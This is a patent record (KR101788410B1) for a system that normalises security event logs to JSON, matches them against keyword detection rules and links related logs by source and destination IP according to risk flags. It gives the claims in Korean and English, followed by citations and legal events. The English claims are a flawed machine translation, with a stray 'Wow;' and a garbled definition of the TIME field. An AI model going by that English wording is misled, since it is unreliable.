An integrated log collecting unit 102 for receiving the event log collected by the local log collecting unit 202 installed in the local terminal 200 and storing the received event log in the integrated log DB 114;
A log normalization unit 104 for normalizing the event log received by the integrated log collecting unit 102, converting the received event log into a JSON (JavaScript Object Notation) file format, and storing the normalized event log in the integrated log DB 114, Wow;
A single event detection unit 106 for analyzing the normalized event log by referring to a detection rule stored in the event detection rule DB 112 and analyzing whether the event log includes an event recording that may cause security breach;
A linkage analysis unit (108) for linking and analyzing a plurality of event logs when a risk flag assigned to an event log to be analyzed by the single event detection unit (106) is a predetermined value;
And a risk measurement unit (110) for determining a connection log type of the event log to be detected by referring to a risk flag column of a detection rule stored in the event detection rule DB (112) Security Infringement Analysis System. 제1항에 있어서,
상기 정규화된 이벤트로그는 "TIME, TYPE, HOST, SRC, DST, CONTENTS_001, CONTENTS_002, CONTENTS_003, CONTENTS_004, LINKED_LOGTYPE"의 필드로 된 데이터로 구성되며,
TIME은 보안이벤트의 탐지시각을 unixtime 형식으로 기록한 것이며, TYPE은 보안 이벤트의 유형이며, HOST는 보안 이벤트의 탐지가 이루어진 센서의 IP 주소 또는 호스트 네임이며, SRC는 보안 이벤트에서 출발지의 IP이며, DST는 보안 이벤트에서 목적지의 IP이며, CONTENTS_001 내지 CONTENTS_004는 보안 이벤트에서 발생하는 상세 내용이며, LINKED_LOGTYPE은 연계분석을 수행할 이벤트로그의 대상을 정의한 것으로서 단일 이벤트 발생 시점을 전후하여 일정 시간동안 일정 임계치 이상 보안 이벤트가 발생한 이벤트로그인 것을 특징으로 하는, 보안 이벤트로그 분석을 통한 보안침해 분석시스템.The method according to claim 1,
The normalized event log is composed of data of fields of "TIME, TYPE, HOST, SRC, DST, CONTENTS_001, CONTENTS_002, CONTENTS_003, CONTENTS_004, LINKED_LOGTYPE"
TIME is the type of security event, HOST is the IP address or host name of the sensor where the security event was detected, SRC is the IP of the source in the security event, DST CONTENTS_001 to CONTENTS_004 are detailed contents of security event. LINKED_LOGTYPE is a definition of the target of event log to perform link analysis. It is defined as an event log for a predetermined time or more before and after a single event occurrence time. The event is logged in the event that the event occurred, characterized by security event log analysis through security breach analysis system. 제2항에 있어서,
상기 연계분석부(108)는
탐지대상이 되는 이벤트로그에 포함된 위험도 플래그가 1인 경우, 상기 이벤트로그에서 SRC를 추출하여 "LINKED_LOGTYPE"에 정의된 이벤트로그를 대상으로 SRC와 DST의 OR 연산에 의한 연계분석을 실시하며,
탐지대상이 되는 이벤트로그에 포함된 위험도 플래그가 2인 경우, 상기 이벤트로그에서 DST를 추출하여 "LINKED_LOGTYPE"에 정의된 이벤트로그를 대상으로 SRC와 DST의 OR 연산에 의한 연계분석을 실시하며,
탐지대상이 되는 이벤트로그에 포함된 위험도 플래그가 3인 경우, 상기 이벤트로그에서 SRC와 DST를 추출하여 "LINKED_LOGTYPE"에 정의된 이벤트로그를 대상으로 SRC와 DST의 AND 연산에 의한 연계분석을 실시하는 것을 특징으로 하는, 보안 이벤트로그 분석을 통한 보안침해 분석시스템.3. The method of claim 2,
The linkage analysis unit 108
If the risk flag included in the event log to be detected is 1, the SRC is extracted from the event log and the link analysis is performed by OR operation of SRC and DST on the event log defined in "LINKED_LOGTYPE &
If the risk flag included in the event log to be detected is 2, the DST is extracted from the event log, and the link analysis is performed by OR operation of SRC and DST on the event log defined in "LINKED_LOGTYPE &
When the risk flag included in the event log to be detected is 3, SRC and DST are extracted from the event log and link analysis is performed by the AND operation of SRC and DST on the event log defined in "LINKED_LOGTYPE" And analyzing the security event log. 제2항에 있어서,
상기 단일이벤트탐지부(106)는 상기 정규화된 이벤트로그에 포함된 데이터 중에서
상기 CONTENTS_001 내지 CONTENTS_004에 대하여 상기 이벤트탐지룰DB(112)에서 참조하는 키워드를 AND, OR, NOT 연산자 조합을 통하여 패턴 매칭하는 컨텐츠 기반 탐지와,
상기 HOST와 상기 SRC, 상기 DST에 대하여 상기 이벤트탐지룰DB(112)에서 참조하는 키워드를 AND, OR, NOT 연산자 조합을 패턴 매칭하는 호스트 기반 탐지 중 하나의 방법을 사용하는 것을 특징으로 하는, 보안 이벤트로그 분석을 통한 보안침해 분석시스템.3. The method of claim 2,
The single event detection unit 106 detects a single event among the data included in the normalized event log
Content-based detection for pattern-matching the keywords referenced in the event detection rule DB 112 with respect to the CONTENTS_001 through CONTENTS_004 through a combination of AND, OR, and NOT operators;
Based detection in which a keyword referred to in the event detection rule DB 112 is pattern-matched with a combination of AND, OR, and NOT operators for the HOST, the SRC, and the DST. Security Infringement Analysis System through Event Log Analysis. 제1항 내지 제4항 중 어느 한 항의 보안침해 분석시스템을 이용한 보안침해 분석방법으로서,
로컬단말기(200)에 설치된 로컬로그수집부(202)가 이벤트로그를 수집하여 전송하면, 통합로그수집부(102)가 수신하여 통합로그DB(114)에 저장하는 제1단계와;
상기 통합로그수집부(102)가 수신한 상기 이벤트로그를 로그정규화부(104)가 정규화하여 JSON(JavaScript Object Notation) 파일 형태로 변환하고, 정규화된 이벤트로그를 상기 통합로그DB(114)에 저장하는 제2단계와;
단일이벤트탐지부(106)가 이벤트탐지룰DB(112)에 저장된 탐지룰을 참조하여 상기 정규화된 이벤트로그를 분석하고, 상기 이벤트로그에 보안침해 가능성이 있는 이벤트 기록이 포함되어 있는지를 분석하는 제3단계와;
위험도측정부(110)가 상기 이벤트탐지룰DB(112)에 저장된 탐지룰의 위험도 플래그 컬럼을 참조하여 탐지대상이 되는 상기 이벤트로그의 연계로그유형을 결정하는 제4단계와;
연계분석부(108)가 상기 단일이벤트탐지부(106)의 분석 대상이 되는 이벤트로그에 대한 위험도 플래그가 소정의 값일 경우, 복수의 이벤트로그를 연계하여 분석하는 제5단계;를 포함하며, 보안 이벤트로그 분석을 통한 보안침해 분석방법.A security infringement analysis method using the security intrusion analysis system according to any one of claims 1 to 4,
When the local log collection unit 202 installed in the local terminal 200 collects and transmits an event log, the integrated log collection unit 102 receives the event log and stores the received event log in the integrated log DB 114;
The log normalization unit 104 normalizes the event log received by the integrated log collecting unit 102 and converts the event log into a JSON (JavaScript Object Notation) file, and stores the normalized event log in the integrated log DB 114 A second step of:
The single event detection unit 106 analyzes the normalized event log by referring to the detection rule stored in the event detection rule DB 112 and analyzes the normalized event log to determine whether the event log includes an event Step 3;
A fourth step of the risk measurement unit 110 determining a joint log type of the event log to be detected by referring to the risk flag column of the detection rule stored in the event detection rule DB 112;
And a fifth step of linking and analyzing a plurality of event logs when the risk analysis flag for the event log to be analyzed by the single event detection unit 106 is a predetermined value, How to analyze security breach through event log analysis. 제5항에 있어서,
상기 정규화된 이벤트로그는 "TIME, TYPE, HOST, SRC, DST, CONTENTS_001, CONTENTS_002, CONTENTS_003, CONTENTS_004, LINKED_LOGTYPE"의 필드로 된 데이터로 구성되며,
TIME은 보안이벤트의 탐지시각을 unixtime 형식으로 기록한 것이며, TYPE은 보안 이벤트의 유형이며, HOST는 보안 이벤트의 탐지가 이루어진 센서의 IP 주소 또는 호스트 네임이며, SRC는 보안 이벤트에서 출발지의 IP이며, DST는 보안 이벤트에서 목적지의 IP이며, CONTENTS_001 내지 CONTENTS_004는 보안 이벤트에서 발생하는 상세 내용이며, LINKED_LOGTYPE은 연계분석을 수행할 이벤트로그의 대상을 정의한 것으로서 단일 이벤트 발생 시점을 전후하여 일정 시간동안 일정 임계치 이상 보안 이벤트가 발생한 이벤트로그인 것을 특징으로 하는, 보안 이벤트로그 분석을 통한 보안침해 분석방법.6. The method of claim 5,
The normalized event log is composed of data of fields of "TIME, TYPE, HOST, SRC, DST, CONTENTS_001, CONTENTS_002, CONTENTS_003, CONTENTS_004, LINKED_LOGTYPE"
TIME is the type of security event, HOST is the IP address or host name of the sensor where the security event was detected, SRC is the IP of the source in the security event, DST CONTENTS_001 to CONTENTS_004 are detailed contents of security event. LINKED_LOGTYPE is a definition of the target of event log to perform link analysis. It is defined as an event log for a predetermined time or more before and after a single event occurrence time. Wherein the event is logged in the event that the event occurred. 제6항에 있어서,
상기 연계분석부(108)는
탐지대상이 되는 이벤트로그에 포함된 위험도 플래그가 1인 경우, 상기 이벤트로그에서 SRC를 추출하여 "LINKED_LOGTYPE"에 정의된 이벤트로그를 대상으로 SRC와 DST의 OR 연산에 의한 연계분석을 실시하며,
탐지대상이 되는 이벤트로그에 포함된 위험도 플래그가 2인 경우, 상기 이벤트로그에서 DST를 추출하여 "LINKED_LOGTYPE"에 정의된 이벤트로그를 대상으로 SRC와 DST의 OR 연산에 의한 연계분석을 실시하며,
탐지대상이 되는 이벤트로그에 포함된 위험도 플래그가 3인 경우, 상기 이벤트로그에서 SRC와 DST를 추출하여 "LINKED_LOGTYPE"에 정의된 이벤트로그를 대상으로 SRC와 DST의 AND 연산에 의한 연계분석을 실시하는 것을 특징으로 하는, 보안 이벤트로그 분석을 통한 보안침해 분석방법.The method according to claim 6,
The linkage analysis unit 108
If the risk flag included in the event log to be detected is 1, the SRC is extracted from the event log and the link analysis is performed by OR operation of SRC and DST on the event log defined in "LINKED_LOGTYPE &
If the risk flag included in the event log to be detected is 2, the DST is extracted from the event log, and the link analysis is performed by OR operation of SRC and DST on the event log defined in "LINKED_LOGTYPE &
When the risk flag included in the event log to be detected is 3, SRC and DST are extracted from the event log and link analysis is performed by the AND operation of SRC and DST on the event log defined in "LINKED_LOGTYPE" And analyzing the security event log. 제6항에 있어서,
상기 단일이벤트탐지부(106)는 상기 정규화된 이벤트로그에 포함된 데이터 중에서
상기 CONTENTS_001 내지 CONTENTS_004에 대하여 상기 이벤트탐지룰DB(112)에서 참조하는 키워드를 AND, OR, NOT 연산자 조합을 통하여 패턴 매칭하는 컨텐츠 기반 탐지와,
상기 HOST와 상기 SRC, 상기 DST에 대하여 상기 이벤트탐지룰DB(112)에서 참조하는 키워드를 AND, OR, NOT 연산자 조합을 패턴 매칭하는 호스트 기반 탐지 중 하나의 방법을 사용하는 것을 특징으로 하는, 보안 이벤트로그 분석을 통한 보안침해 분석방법.The method according to claim 6,
The single event detection unit 106 detects a single event among the data included in the normalized event log
Content-based detection for pattern-matching the keywords referenced in the event detection rule DB 112 with respect to the CONTENTS_001 through CONTENTS_004 through a combination of AND, OR, and NOT operators;
Based detection in which a keyword referred to in the event detection rule DB 112 is pattern-matched with a combination of AND, OR, and NOT operators for the HOST, the SRC, and the DST. How to analyze security breach through event log analysis.
KR1020150161973A 2015-11-18 2015-11-18 An analysis system of security breach with analyzing a security event log and an analysis method thereof KR101788410B1 (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
KR1020150161973A KR101788410B1 (en) 2015-11-18 2015-11-18 An analysis system of security breach with analyzing a security event log and an analysis method thereof

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
KR1020150161973A KR101788410B1 (en) 2015-11-18 2015-11-18 An analysis system of security breach with analyzing a security event log and an analysis method thereof

Publications (2)

Publication Number Publication Date
KR20170058140A true KR20170058140A (en) 2017-05-26
KR101788410B1 KR101788410B1 (en) 2017-10-19

Family

ID=59052141

Family Applications (1)

Application Number Title Priority Date Filing Date
KR1020150161973A KR101788410B1 (en) 2015-11-18 2015-11-18 An analysis system of security breach with analyzing a security event log and an analysis method thereof

Country Status (1)

Country Link
KR (1) KR101788410B1 (en)

Cited By (8)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
KR102038926B1 (en) * 2018-11-17 2019-11-15 한국과학기술정보연구원 Aggressor selecting device and control method thereof
KR102158784B1 (en) * 2020-05-14 2020-09-22 주식회사 쿼리시스템즈 System for automatically blocking security threats that interoperate with heterogeneous security devices
KR102215228B1 (en) 2020-04-13 2021-02-10 서울과학기술대학교 산학협력단 Detection and Elimination System and Method of Redundant Access Patterns in Programs by Analyzing Log Data
CN113592690A (en) * 2021-07-30 2021-11-02 卡斯柯信号有限公司 Database model-based hazard management method
KR102426889B1 (en) * 2022-01-05 2022-07-29 주식회사 이글루코퍼레이션 Apparatus, method and program for analyzing and processing data by log type for large-capacity event log
CN114826727A (en) * 2022-04-22 2022-07-29 南方电网数字电网研究院有限公司 Flow data acquisition method and device, computer equipment and storage medium
KR20230055232A (en) * 2021-10-18 2023-04-25 주식회사 페스카로 Method and system for estimating the time of occurrence of a security event
CN116232751A (en) * 2023-03-16 2023-06-06 中国华能集团有限公司北京招标分公司 Safety alarm analysis method

Families Citing this family (1)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
KR20240162797A (en) 2023-05-09 2024-11-18 한전케이디엔주식회사 System and method for detection and response cloud incident based on threat hunting

Cited By (12)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
KR102038926B1 (en) * 2018-11-17 2019-11-15 한국과학기술정보연구원 Aggressor selecting device and control method thereof
KR102215228B1 (en) 2020-04-13 2021-02-10 서울과학기술대학교 산학협력단 Detection and Elimination System and Method of Redundant Access Patterns in Programs by Analyzing Log Data
KR102158784B1 (en) * 2020-05-14 2020-09-22 주식회사 쿼리시스템즈 System for automatically blocking security threats that interoperate with heterogeneous security devices
CN113592690A (en) * 2021-07-30 2021-11-02 卡斯柯信号有限公司 Database model-based hazard management method
CN113592690B (en) * 2021-07-30 2024-03-29 卡斯柯信号有限公司 Hazard management method based on database model
KR20230055232A (en) * 2021-10-18 2023-04-25 주식회사 페스카로 Method and system for estimating the time of occurrence of a security event
KR102426889B1 (en) * 2022-01-05 2022-07-29 주식회사 이글루코퍼레이션 Apparatus, method and program for analyzing and processing data by log type for large-capacity event log
KR20230106083A (en) * 2022-01-05 2023-07-12 주식회사 이글루코퍼레이션 Device, method and program that analyzes large log data using a distributed method for each log type
KR20240051094A (en) * 2022-01-05 2024-04-19 주식회사 이글루코퍼레이션 Device for analyzing large amounts of log data based on ruleset, its control method and program
CN114826727A (en) * 2022-04-22 2022-07-29 南方电网数字电网研究院有限公司 Flow data acquisition method and device, computer equipment and storage medium
CN114826727B (en) * 2022-04-22 2024-05-07 南方电网数字电网研究院有限公司 Flow data acquisition method, device, computer equipment and storage medium
CN116232751A (en) * 2023-03-16 2023-06-06 中国华能集团有限公司北京招标分公司 Safety alarm analysis method

Also Published As

Publication number Publication date
KR101788410B1 (en) 2017-10-19

Similar Documents

Publication Publication Date Title
KR101788410B1 (en) An analysis system of security breach with analyzing a security event log and an analysis method thereof
JP6863969B2 (en) Detecting security incidents with unreliable security events
EP2953298B1 (en) Log analysis device, information processing method and program
KR101689298B1 (en) Automated verification method of security event and automated verification apparatus of security event
CN111800395A (en) Threat information defense method and system
CN114598525A (en) IP automatic blocking method and device for network attack
CN107295021B (en) Security detection method and system of host based on centralized management
Wang et al. NetSpy: Automatic generation of spyware signatures for NIDS
US20030083847A1 (en) User interface for presenting data for an intrusion protection system
CN107733699B (en) Internet asset security management method, system, device and readable storage medium
US20200106791A1 (en) Intelligent system for mitigating cybersecurity risk by analyzing domain name system traffic metrics
CN114640548A (en) Network security sensing and early warning method and system based on big data
WO2016121348A1 (en) Anti-malware device, anti-malware system, anti-malware method, and recording medium in which anti-malware program is stored
KR101768079B1 (en) System and method for improvement invasion detection
CN110868403B (en) Method and equipment for identifying advanced persistent Attack (APT)
CN113660115B (en) Alarm-based network security data processing method, device and system
US10897472B1 (en) IT computer network threat analysis, detection and containment
KR20070072835A (en) How to respond to web hacking by collecting web logs in real time
KR20130116418A (en) Apparatus, method and computer readable recording medium for analyzing a reputation of an internet protocol
KR101767591B1 (en) System and method for improvement invasion detection
Lee et al. Sierra: Ranking anomalous activities in enterprise networks
Yang et al. True attacks, attack attempts, or benign triggers? an empirical measurement of network alerts in a security operations center
CN111355688A (en) Core method and device for automatic infiltration and analysis based on AI technology
Kergl et al. Detection of zero day exploits using real-time social media streams
KR101518233B1 (en) Security Apparatus for Threats Detection in the Enterprise Internal Computation Environment

Legal Events

Date Code Title Description
A201 Request for examination
PA0109 Patent application

Patent event code: PA01091R01D

Comment text: Patent Application

Patent event date: 20151118

PA0201 Request for examination
E902 Notification of reason for refusal
PE0902 Notice of grounds for rejection

Comment text: Notification of reason for refusal

Patent event date: 20170113

Patent event code: PE09021S01D

PG1501 Laying open of application
E701 Decision to grant or registration of patent right
PE0701 Decision of registration

Patent event code: PE07011S01D

Comment text: Decision to Grant Registration

Patent event date: 20170822

PR0701 Registration of establishment

Comment text: Registration of Establishment

Patent event date: 20171013

Patent event code: PR07011E01D

PR1002 Payment of registration fee

Payment date: 20171013

End annual number: 3

Start annual number: 1

PG1601 Publication of registration
PR1001 Payment of annual fee

Payment date: 20201012

Start annual number: 4

End annual number: 6

PR1001 Payment of annual fee

Payment date: 20230220

Start annual number: 7

End annual number: 7

PR1001 Payment of annual fee

Payment date: 20240304

Start annual number: 8

End annual number: 8

PR1001 Payment of annual fee

Payment date: 20250109

Start annual number: 9

End annual number: 9